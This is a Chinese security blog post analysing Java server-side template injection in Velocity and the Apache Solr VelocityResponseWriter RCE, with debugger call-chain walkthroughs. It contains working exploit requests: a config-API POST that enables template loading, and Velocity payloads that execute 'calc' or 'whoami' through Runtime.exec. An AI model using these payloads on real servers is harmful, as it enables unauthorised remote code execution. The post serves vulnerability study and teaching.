
<!DOCTYPE html>
<html lang="zh-Hans" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>春眠不觉晓，RCE知多少？ - 像清水一般清澈透明</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="清水Samny,"> 
    <meta name="description" content="前言为什么说Java审计南在SSTI呢？

现行SSTI(Server-Side Template Injection ) 资料不少，但与Java，以著名的先知社区为例（如下图所示），关于SSTI文,"> 
    <meta name="author" content="Samny"> 
    <link rel="alternative" href="atom.xml" title="像清水一般清澈透明" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">

    
<link rel="stylesheet" href="/css/diaspora.css">

    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script>
         (adsbygoogle = window.adsbygoogle || []).push({
              google_ad_client: "ca-pub-8691406134231910",
              enable_page_level_ads: true
         });
    </script>
    <script async custom-element="amp-auto-ads"
        src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js">
    </script>
<meta name="generator" content="Hexo 4.1.1"></head>

<body class="loading">
    <span id="config-title" style="display:none">像清水一般清澈透明</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="icon-home image-icon" href="javascript:;" data-url="http://yoursite.com"></a>
    <div title="播放/暂停" class="icon-play"></div>
    <h3 class="subtitle">春眠不觉晓，RCE知多少？</h3>
    <div class="social">
        <!--<div class="like-icon">-->
            <!--<a href="javascript:;" class="likeThis active"><span class="icon-like"></span><span class="count">76</span></a>-->
        <!--</div>-->
        <div>
            <div class="share">
                <a title="获取二维码" class="icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">春眠不觉晓，RCE知多少？</h1>
        <div class="stuff">
            <span>三月 24, 2020</span>
            
  <ul class="post-tags-list" itemprop="keywords"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/Java-SSTI/" rel="tag">Java SSTI</a></li></ul>


        </div>
        <div class="content markdown">
            <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p><strong>为什么说Java审计南在SSTI呢？</strong></p>
<ol>
<li>现行SSTI(Server-Side Template Injection ) 资料不少，但与Java，以著名的先知社区为例（如下图所示），关于SSTI文章也不过几篇而已，但与Java相关的一篇都没有。<br><img src="https://img-blog.csdnimg.cn/2020031517280148.png" alt="在这里插入图片描述"></li>
<li>搜索CVE漏洞有关于SSTI的漏洞编号也不过只有几个而已。<br><img src="https://img-blog.csdnimg.cn/20200317133833592.png" alt="在这里插入图片描述"></li>
<li>如果你是一名老司机，已经挖过ssti漏洞，那你是否知道payload构造原理呢？本文为你解惑！老司机可以直接跳转到后记看本文，或者你只是想看payload构造原理亦如此，本文篇幅较长，建议先收藏。</li>
</ol>
<hr>
<h1 id="SSTI-服务端模板注入"><a href="#SSTI-服务端模板注入" class="headerlink" title="SSTI 服务端模板注入"></a>SSTI 服务端模板注入</h1><p>&emsp;&emsp; ssti服务端模板注入，ssti主要为python的一些框架 jinja2、 mako tornado 、django，PHP框架smarty twig，java框架FreeMarker、jade、 velocity等等使用了渲染函数时，由于代码不规范或信任了用户输入而导致了服务端模板注入，模板渲染其实并没有漏洞，主要是程序员对代码不规范不严谨造成了模板注入漏洞，造成模板可控。</p>
<p><img src="https://img-blog.csdnimg.cn/202003161429497.gif" alt="在这里插入图片描述"></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 漏洞源码</span></span><br><span class="line"><span class="function"><span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">velocity</span><span class="params">(String template)</span></span>&#123;</span><br><span class="line">        Velocity.init();</span><br><span class="line"></span><br><span class="line">        VelocityContext context = <span class="keyword">new</span> VelocityContext();</span><br><span class="line"></span><br><span class="line">        context.put(<span class="string">"author"</span>, <span class="string">"Elliot A."</span>);</span><br><span class="line">        context.put(<span class="string">"address"</span>, <span class="string">"217 E Broadway"</span>);</span><br><span class="line">        context.put(<span class="string">"phone"</span>, <span class="string">"555-1337"</span>);</span><br><span class="line"></span><br><span class="line">        StringWriter swOut = <span class="keyword">new</span> StringWriter();</span><br><span class="line">        <span class="comment">// 使用Velocity</span></span><br><span class="line">        Velocity.evaluate(context, swOut, <span class="string">"test"</span>, template);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p><strong>POC</strong><br><code>http://localhost:8080/ssti/velocity?template=%23set(%24e=%22e%22);%24e.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22,null).invoke(null,null).exec(%22calc%22)</code></p>
<hr>
<h2 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a><strong>漏洞分析</strong></h2><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Velocity.evaluate函数源码</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">boolean</span> <span class="title">evaluate</span><span class="params">(Context context, Writer out, String logTag, String instring)</span> <span class="keyword">throws</span> ParseErrorException, MethodInvocationException, ResourceNotFoundException </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> RuntimeSingleton.getRuntimeServices().evaluate(context, out, logTag, instring);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<ul>
<li>设置断点开始调试</li>
</ul>
<p><img src="https://img-blog.csdnimg.cn/20200316151247751.png" alt="在这里插入图片描述"></p>
<ul>
<li>进入Velocity.evaluate方法查看方法详情</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">boolean</span> <span class="title">evaluate</span><span class="params">(Context context, Writer out, String logTag, String instring)</span> <span class="keyword">throws</span> ParseErrorException, MethodInvocationException, ResourceNotFoundException </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> RuntimeSingleton.getRuntimeServices().evaluate(context, out, logTag, instring);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20200316151614641.png" alt="在这里插入图片描述"></p>
<ul>
<li>继续跟进查看，这个就是Java最常见的get方法(初始化)。也是Java的特性之一封装性。</li>
</ul>
<p><img src="https://img-blog.csdnimg.cn/20200316152752486.png" alt="在这里插入图片描述"></p>
<ul>
<li>RuntimeInstance类中封装了evaluate方法，instring被强制转化(Reader)类型。</li>
</ul>
<p><img src="https://img-blog.csdnimg.cn/20200316153220725.png" alt="在这里插入图片描述"></p>
<ul>
<li>进入StringReader看看</li>
</ul>
<p><img src="https://img-blog.csdnimg.cn/20200316154323392.png" alt="在这里插入图片描述"></p>
<ul>
<li>在进入evaluate查看方法具体实现过程</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">boolean</span> <span class="title">evaluate</span><span class="params">(Context context, Writer writer, String logTag, Reader reader)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (logTag == <span class="keyword">null</span>) &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> NullPointerException(<span class="string">"logTag (i.e. template name) cannot be null, you must provide an identifier for the content being evaluated"</span>);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        </span><br><span class="line">            SimpleNode nodeTree = <span class="keyword">null</span>;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="comment">// 来到这里进行解析</span></span><br><span class="line">                nodeTree = <span class="keyword">this</span>.parse(reader, logTag);</span><br><span class="line">            &#125; <span class="keyword">catch</span> (ParseException var7) &#123;</span><br><span class="line">                <span class="keyword">throw</span> <span class="keyword">new</span> ParseErrorException(var7, (String)<span class="keyword">null</span>);</span><br><span class="line">            &#125; <span class="keyword">catch</span> (TemplateInitException var8) &#123;</span><br><span class="line">                <span class="keyword">throw</span> <span class="keyword">new</span> ParseErrorException(var8, (String)<span class="keyword">null</span>);</span><br><span class="line">            &#125;</span><br><span class="line">           <span class="comment">// 判断，然后进入this.render方法</span></span><br><span class="line">            <span class="keyword">return</span> nodeTree == <span class="keyword">null</span> ? <span class="keyword">false</span> : <span class="keyword">this</span>.render(context, writer, logTag, nodeTree);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<ul>
<li>继续跟进render方法</li>
</ul>
<p><img src="https://img-blog.csdnimg.cn/20200316161419209.png" alt="在这里插入图片描述"></p>
<ul>
<li>render方法里面还有一个render方法，真的是™烦。不过这个是simpleNodel类的render方法。</li>
</ul>
<p><img src="https://img-blog.csdnimg.cn/20200316161613552.png" alt="在这里插入图片描述"></p>
<ul>
<li><strong>高潮激情部分</strong>，由于前面两个没有什么用，让我们直接跳到第三个看，进入render方法。</li>
</ul>
<p><img src="https://img-blog.csdnimg.cn/20200316162015493.png" alt="在这里插入图片描述"></p>
<ul>
<li>在这里我们不能发现有一个execute方法，这就是罪魁祸首。</li>
</ul>
<p><img src="https://img-blog.csdnimg.cn/20200316162552984.png" alt="在这里插入图片描述"></p>
<ul>
<li>让我们进行跟进方法，由于是重构的execute方法，还是得看清楚点原理。</li>
</ul>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 截取的部分关键性源代码</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i = <span class="number">0</span>; i &lt; <span class="keyword">this</span>.numChildren; ++i) &#123;</span><br><span class="line">                        <span class="keyword">if</span> (<span class="keyword">this</span>.strictRef &amp;&amp; result == <span class="keyword">null</span>) &#123;</span><br><span class="line">                            methodName = <span class="keyword">this</span>.jjtGetChild(i).getFirstToken().image;</span><br><span class="line">                            <span class="keyword">throw</span> <span class="keyword">new</span> VelocityException(<span class="string">"Attempted to access '"</span> + methodName + <span class="string">"' on a null value at "</span> + Log.formatFileString(<span class="keyword">this</span>.uberInfo.getTemplateName(), <span class="keyword">this</span>.jjtGetChild(i).getLine(), <span class="keyword">this</span>.jjtGetChild(i).getColumn()));</span><br><span class="line">                        &#125;</span><br><span class="line"></span><br><span class="line">                        previousResult = result;</span><br><span class="line">                        result = <span class="keyword">this</span>.jjtGetChild(i).execute(result, context);</span><br><span class="line">                        <span class="keyword">if</span> (result == <span class="keyword">null</span> &amp;&amp; !<span class="keyword">this</span>.strictRef) &#123;</span><br><span class="line">                            failedChild = i;</span><br><span class="line">                            <span class="keyword">break</span>;</span><br><span class="line">                        &#125;</span><br><span class="line">                    &#125;</span><br></pre></td></tr></table></figure>

<ul>
<li><p>上面的for循环我就不说了它的作用了，我们焦点放在previousResult （之前的结果）和result上面。</p>
</li>
<li><p>previousResult = result;首先这行代码使其它们保持一致</p>
</li>
<li><p>当遍历的节点时候，这时候就会一步步的保存我们的payload最终导致RCE<br><img src="https://img-blog.csdnimg.cn/20200316155414726.png" alt="在这里插入图片描述"></p>
</li>
<li><p>完整的效果展示<br><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly91cGxvYWQtaW1hZ2VzLmppYW5zaHUuaW8vdXBsb2FkX2ltYWdlcy8xMTE0NTgwMS1mYjEyMzA5YjRjMDU5MmE2LmdpZg" alt></p>
</li>
<li><p>完整的调用链</p>
</li>
</ul>
<p><img src="https://img-blog.csdnimg.cn/20200316162402512.png" alt="在这里插入图片描述"></p>
<hr>
<h1 id="案例分析-—-Apache-solr-Velocity-模版注入"><a href="#案例分析-—-Apache-solr-Velocity-模版注入" class="headerlink" title="案例分析 — Apache solr Velocity 模版注入"></a>案例分析 — Apache solr Velocity 模版注入</h1><h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><p>&emsp;&emsp; 这个漏洞是去年10月底爆出的漏洞，这里只做必要的简单复现，笔者在这篇文章里主要是分析，更加完整的<a href="https://blog.csdn.net/sun1318578251/article/details/102843715" target="_blank" rel="noopener">漏洞复现过程</a>参考。</p>
<ol>
<li>第一步修改配置，开启Velocity模版里<code>VelocityResponseWriter</code>初始化参数的<code>params.resource.loader.enabled</code>选项，该选项默认是<code>false</code>。查看<a href="https://www.w3cschool.cn/solr_doc/solr_doc-wcyd2hyj.html" target="_blank" rel="noopener">W3Cschool solr官方文档</a>可知，solr是配置api可以进行查看配置、修改配置的。</li>
</ol>
<p>访问查看<code>http://127.0.0.1:8983/solr/test/config</code>配置信息<br><img src="https://img-blog.csdnimg.cn/20200321162727737.png" alt="在这里插入图片描述"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">POST &#x2F;solr&#x2F;test&#x2F;config HTTP&#x2F;1.1</span><br><span class="line">Host: 127.0.0.1:8983</span><br><span class="line">Content-Type: application&#x2F;json</span><br><span class="line">Content-Length: 259</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">  &quot;update-queryresponsewriter&quot;: &#123;</span><br><span class="line">    &quot;startup&quot;: &quot;lazy&quot;,</span><br><span class="line">    &quot;name&quot;: &quot;velocity&quot;,</span><br><span class="line">    &quot;class&quot;: &quot;solr.VelocityResponseWriter&quot;,</span><br><span class="line">    &quot;template.base.dir&quot;: &quot;&quot;,</span><br><span class="line">    &quot;solr.resource.loader.enabled&quot;: &quot;true&quot;,</span><br><span class="line">    &quot;params.resource.loader.enabled&quot;: &quot;true&quot;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200317150202155.png" alt="在这里插入图片描述"></p>
<hr>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GET &#x2F;solr&#x2F;test&#x2F;select?q&#x3D;1&amp;&amp;wt&#x3D;velocity&amp;v.template&#x3D;custom&amp;v.template.custom&#x3D;%23set($x&#x3D;%27%27)+%23set($rt&#x3D;$x.class.forName(%27java.lang.Runtime%27))+%23set($chr&#x3D;$x.class.forName(%27java.lang.Character%27))+%23set($str&#x3D;$x.class.forName(%27java.lang.String%27))+%23set($ex&#x3D;$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out&#x3D;$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP&#x2F;1.1</span><br><span class="line">Host: 127.0.0.1:8983</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200317151703268.png" alt="在这里插入图片描述"></p>
<hr>
<h2 id="漏洞分析环境搭建"><a href="#漏洞分析环境搭建" class="headerlink" title="漏洞分析环境搭建"></a>漏洞分析环境搭建</h2><p>&emsp;&emsp; 笔者在此是使用远程代码调试的方式，分析源码。<a href="https://archive.apache.org/dist/lucene/solr/8.2.0/" target="_blank" rel="noopener">源码下载地址</a>windows用户可以选择下载这两个，这里笔者下载下载第二个。（下载第一个需要编译，过程自行百度）<br><img src="https://img-blog.csdnimg.cn/20200317160246408.png" alt="在这里插入图片描述"></p>
<ol>
<li><p>解压，将源码导入idea中，并配置idea中远程代码调试。<br><img src="https://img-blog.csdnimg.cn/20200317160450347.png" alt="在这里插入图片描述"></p>
</li>
<li><p>在第二个下载压缩包路径CMD环境下（~~\solr-8.2.0\bin\），启动命令<code>solr start -p 8983 -f -a &quot;-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=8983&quot;</code><br><img src="https://img-blog.csdnimg.cn/20200317161340408.png" alt="在这里插入图片描述"></p>
</li>
<li><p>用idea打开项目，导入jar文件设置为library。（还有几处在solr-8.2.0\contrib\velocity\lib、solr-8.2.0\server\lib……）<br><img src="https://img-blog.csdnimg.cn/20200323143907966.png" alt="在这里插入图片描述"></p>
</li>
<li><p>打断点调试代码。分析一个web项目首先我们得看web.xml文件<code>E:\Soures\solr-8.2.0\server\solr-webapp\webapp\WEB-INF\web.xml</code>，看第一句，发现<code>在solrconfig.xml中注册的任何路径（名称）都将发送到该过滤器</code>。<br><img src="https://img-blog.csdnimg.cn/20200321153010735.png" alt="在这里插入图片描述"></p>
</li>
</ol>
<ul>
<li>断点位置，为什么会在这里打个断点，笔者翻阅资料得知这里是核心位置。具体参考<a href="https://my.oschina.net/haitaohu/blog/3078667" target="_blank" rel="noopener">solr源码阅读</a>。<br><img src="https://img-blog.csdnimg.cn/20200321154555773.png" alt="在这里插入图片描述"></li>
</ul>
<hr>
<h2 id="漏洞成因分析-–-代码层"><a href="#漏洞成因分析-–-代码层" class="headerlink" title="漏洞成因分析 – 代码层"></a>漏洞成因分析 – 代码层</h2><h3 id="POC第一部分"><a href="#POC第一部分" class="headerlink" title="POC第一部分"></a>POC第一部分</h3><p>&emsp;&emsp; 第一部分分析请查看<a href="https://www.w3cschool.cn/solr_doc/solr_doc-wcyd2hyj.html" target="_blank" rel="noopener">Solr配置API：Config API</a>文档，文档中说明的很清楚。PS：漏洞复现的时候也有说明。<br><img src="https://img-blog.csdnimg.cn/2020032319153017.png?" alt="在这里插入图片描述"></p>
<hr>
<h3 id="POC后部分分析"><a href="#POC后部分分析" class="headerlink" title="POC后部分分析"></a>POC后部分分析</h3><ol>
<li>笔者这里直接说几个关键的部分代码<br>第一步先处理请求<br><img src="https://img-blog.csdnimg.cn/20200324135210989.png" alt="在这里插入图片描述"><ol start="2">
<li><code>E:\Soures\solr-8.2.0\server\solr-webapp\webapp\WEB-INF\lib\solr-core-8.2.0.jar!\org\apache\solr\servlet\SolrDispatchFilter.class</code>跳转到<code>E:\Soures\solr-8.2.0\server\solr-webapp\webapp\WEB-INF\lib\solr-core-8.2.0.jar!\org\apache\solr\servlet\HttpSolrCall.class</code> 先处理参数wt，设置为velocity。<br><img src="https://img-blog.csdnimg.cn/20200324140636319.png" alt="在这里插入图片描述"></li>
<li>写入响应<br><img src="https://img-blog.csdnimg.cn/202003241354181.png" alt="在这里插入图片描述"></li>
<li>判断方法，写查询响应，进一步查看内容。solrReuest就是我们的payload。<br><img src="https://img-blog.csdnimg.cn/2020032414122987.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20200324141356198.png" alt="在这里插入图片描述"></li>
<li>跳转到velocityResponWriter.class,会创建velocity模板引擎。在到133行的位置进入模板方法<br><img src="https://img-blog.csdnimg.cn/20200324141530325.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20200324141916156.png" alt="在这里插入图片描述"></li>
<li>在这里会跳转到SimpleNode.class类（我们熟悉的类），第一步会设置指引，接着会到ASTReference.class 在第八的位置，会遍历方法，会执行命令。<br><img src="https://img-blog.csdnimg.cn/20200324142424569.png" alt="在这里插入图片描述"></li>
<li>在这里会跳转到ASTMethod类中，执行。<br><img src="https://img-blog.csdnimg.cn/20200324143631629.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3N1bjEzMTg1NzgyNTE=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述">)<img src="https://img-blog.csdnimg.cn/20200324143501469.png" alt="在这里插入图片描述"></li>
<li>具体执行是velocity模板引擎中有一个ClassMap类中。<br><img src="https://img-blog.csdnimg.cn/20200323201336890.png" alt="在这里插入图片描述"></li>
</ol>
</li>
</ol>
<hr>
<h1 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h1><h2 id="知识补充"><a href="#知识补充" class="headerlink" title="知识补充"></a><strong>知识补充</strong></h2><p>&emsp;&emsp; 在前面有涉及到JJTree、payload构造、JavaCC等知识，但笔者并没有详细的说明，笔者想先读者们简单了解一下这些知识，然后在说明一下简单做个简单说明。</p>
<h2 id="set语法"><a href="#set语法" class="headerlink" title="#set语法"></a><strong>#set语法</strong></h2><p>&emsp;&emsp; #set语法可以创建一个Velocity的变量，#set语法对应的Velocity语法树是ASTSetDirective类，翻开这个类的代码，可以发现它有两个子节点：分别是RightHandSide和LeftHandSide，分别代表“=”两边的表达式值。与Java语言的赋值操作有点不一样的是，左边的LeftHandSide可能是一个变量标识符，也可能是一个set方法调用。变量标识符很好理解，如前面的#set($var=“偶数”)，另外是一个set方法调用，如#set($person.name=”junshan”)，这实际上相当于Java中person.setName(“junshan”)方法的调用。</p>
<h2 id="foreach语法"><a href="#foreach语法" class="headerlink" title="#foreach语法"></a><strong>#foreach语法</strong></h2><p>Velocity中的循环语法只有这一种，它与Java中的for循环的语法糖形式十分类似，如#foreach($child in $person.children) $person.children表示的是一个集合，它可能是一个List集合或者一个数组，而$child表示的是每个从集合中取出的值。从render方法代码中可以看出，Velocity首先是取得$person.children的值，然后将这个值封装成Iterator集合，然后依次取出这个集合中的每一个值，将这个值以$child为变量标识符放入context中。除此以外需要特别注意的是，Velocity在循环时还在context中放入了另外两个变量，分别是counterName和hasNextName，这两个变量的名称分别在配置文件配置项directive.foreach.counter.name和directive.foreach.iterator.name中定义，它们表示当前的循环计数和是否还有下一个值。前者相当于for(int i=1;i&lt;10;i++)中的i值，后者相当于while(it.hasNext())中的it.hasNext()的值，这两个值在#foreach的循环体中都有可能用到。由于elementKey、counterName和hasNextName是在#foreach中临时创建的，如果当前的context中已经存在这几个变量，要把原始的变量值保存起来，以便在这个#foreach执行结束后恢复。如果context中没有这几个变量，那么#foreach执行结束后要删除它们，这就是代码最后部分做的事情，这与我们前面介绍的#set语法没有范围限制不同，#foreach中临时产生的变量只在#foreach中有效。</p>
<h2 id="JJTree渲染过程解析"><a href="#JJTree渲染过程解析" class="headerlink" title="JJTree渲染过程解析"></a><strong>JJTree渲染过程解析</strong></h2><p>下面是JJTree的语法树：<br><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9pbWFnZXMyMDE1LmNuYmxvZ3MuY29tL2Jsb2cvOTkwNTMyLzIwMTYxMC85OTA1MzItMjAxNjEwMjUxNTI3NDM3NTAtMTA4MzgwODIyOC5wbmc?x-oss-process=image/format,png" alt></p>
<h2 id="关于POC构造方法补充说明"><a href="#关于POC构造方法补充说明" class="headerlink" title="关于POC构造方法补充说明"></a><strong>关于POC构造方法补充说明</strong></h2><p><strong>VelocityResponseWriter 初始化参数</strong></p>
<ul>
<li>template.base.dir<br>如果指定并作为文件系统目录存在，则将为此目录添加一个文件资源加载程序。此目录中的模板将覆盖 “solr” 资源加载程序模板。 </li>
<li>init.properties.file<br>指定一个属性文件名，必须存在于 Solr 的conf/目录（而不是在velocity/子目录中）或者 <lib> 的 JAR 文件的根中。 </lib></li>
<li>params.resource.loader.enabled<br>“params” 资源加载程序允许在 Solr 请求参数中指定模板。例如：</li>
</ul>
<p><code>http://localhost:8983/solr/gettingstarted/select?q=\*:*&amp;wt=velocity&amp;v.template=custom&amp;v.template.custom=CUSTOM%3A%20%23core_name
v.template=custom</code>表示要呈现一个名为“自定义”的模板，其值<code>v.template.custom</code>是自定义模板。默认情况下为<code>false</code>；它不常用，需要时启用。</p>
<ul>
<li>solr.resource.loader.enabled<br>“solr” 资源加载程序是默认注册的唯一模板加载程序。模板是由 SolrResourceLoader 从velocity/子目录下可见的资源提供的。VelocityResponseWriter 本身有一些内置的模板（在它 JAR 文件中的velocity/），这些模板可以通过这个加载程序自动使用。当相同的模板名称处于 conf/velocity/ 或使用template.base.dir选项时，可以覆盖这些内置模板。 </li>
</ul>
<hr>
<p><strong>VelocityResponseWriter请求参数</strong></p>
<ul>
<li><p>v.template<br>指定要呈现的模板的名称。</p>
</li>
<li><p>v.layout<br>指定一个模板名称，用作围绕主<code>v.template</code>指定模板的布局。<br>主模板呈现为包含在布局渲染中的字符串值$content。</p>
</li>
<li><p>v.layout.enabled<br>确定主模板是否应该有围绕它的布局。默认是<code>true</code>，但也需要指定<code>v.layout</code>。<br>v.contentType<br>指定 HTTP 响应中使用的内容类型。如果没有指定，默认取决于是否指定<code>v.json</code>。<br>默认情况下不包含<code>v.json=wrf：text/html;charset=UTF-8</code>。<br>默认为<code>v.json=wrf：application/json;charset=UTF-8</code>。</p>
</li>
<li><p>v.json<br>指定一个函数名称来包装呈现为 JSON 的响应。如果指定，则响应中使用的内容类型将为“application / json; charset = UTF-8”，除非被<code>v.contentType</code>覆盖。<br>输出将采用以下格式（带<code>v.json=wrf</code>）：</p>
  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wrf(&quot;result&quot;:&quot;&lt;Velocity generated response string, with quotes and backslashes escaped&gt;&quot;)</span><br></pre></td></tr></table></figure>
</li>
<li><p>v.locale<br>使用<code>$resource</code>工具和其他 LocaleConfig 实现工具的语言环境。默认语言环境是<code>Locale.ROOT</code>。本地化资源从名为<code>resources[_locale-code].properties</code>的标准 Java 资源包中加载<br>可以通过提供由 SolrResourceLoader 在速度子下的资源包可见的 JAR 文件来添加资源包。资源包不能在<code>conf/</code>下加载，因为只有 SolrResourceLoader 的类加载程序方面可以在这里使用。</p>
</li>
<li><p>v.template.template_name<br>当启用 “params” 资源加载程序时，可以将模板指定为 Solr 请求的一部分。<br><code>params.resource.loader.enabled</code><br>“params” 资源加载程序允许在 Solr 请求参数中指定模板。例如：<br><code>http://localhost:8983/solr/gettingstarted/select?q=\*:*&amp;wt=velocity&amp;v.template=custom&amp;v.template.custom=CUSTOM%3A%20%23core_name</code></p>
</li>
</ul>
<hr>
<ol>
<li>先将poc进行解码<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1:8983&#x2F;solr&#x2F;test&#x2F;select?q&#x3D;1&amp;&amp;wt&#x3D;velocity&amp;v.template&#x3D;custom&amp;v.template.custom&#x3D;#set($x&#x3D;&#39;&#39;) #set($rt&#x3D;$x.class.forName(&#39;java.lang.Runtime&#39;)) #set($chr&#x3D;$x.class.forName(&#39;java.lang.Character&#39;)) #set($str&#x3D;$x.class.forName(&#39;java.lang.String&#39;)) #set($ex&#x3D;$rt.getRuntime().exec(&#39;calc&#39;)) $ex.waitFor() #set($out&#x3D;$ex.getInputStream()) #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end</span><br></pre></td></tr></table></figure></li>
<li>set和foreach语法前面都介绍了，现在在看payload是不是就一目了然了？如何构造，为什么这么构造..<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">#set($x='')  </span><br><span class="line">#set($rt=$x.class.forName('java.lang.Runtime'))</span><br><span class="line">#set($chr=$x.class.forName('java.lang.Character'))  </span><br><span class="line">#set($str=$x.class.forName('java.lang.String'))</span><br><span class="line">#set($ex=$rt.getRuntime().exec('calc'))$ex.waitFor() </span><br><span class="line">#set($out=$ex.getInputStream())</span><br><span class="line">#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))</span><br><span class="line">#end</span><br></pre></td></tr></table></figure>
<img src="https://img-blog.csdnimg.cn/2020031621445369.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20200316214532444.png" alt="在这里插入图片描述"></li>
</ol>
<hr>
<p><strong>附图：各框架模板结构：</strong><br><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly9wNS5zc2wucWhpbWcuY29tL3QwMWY0NzkyYzdkMDNkZDQ5Y2MucG5n?x-oss-process=image/format,png" alt></p>
<hr>
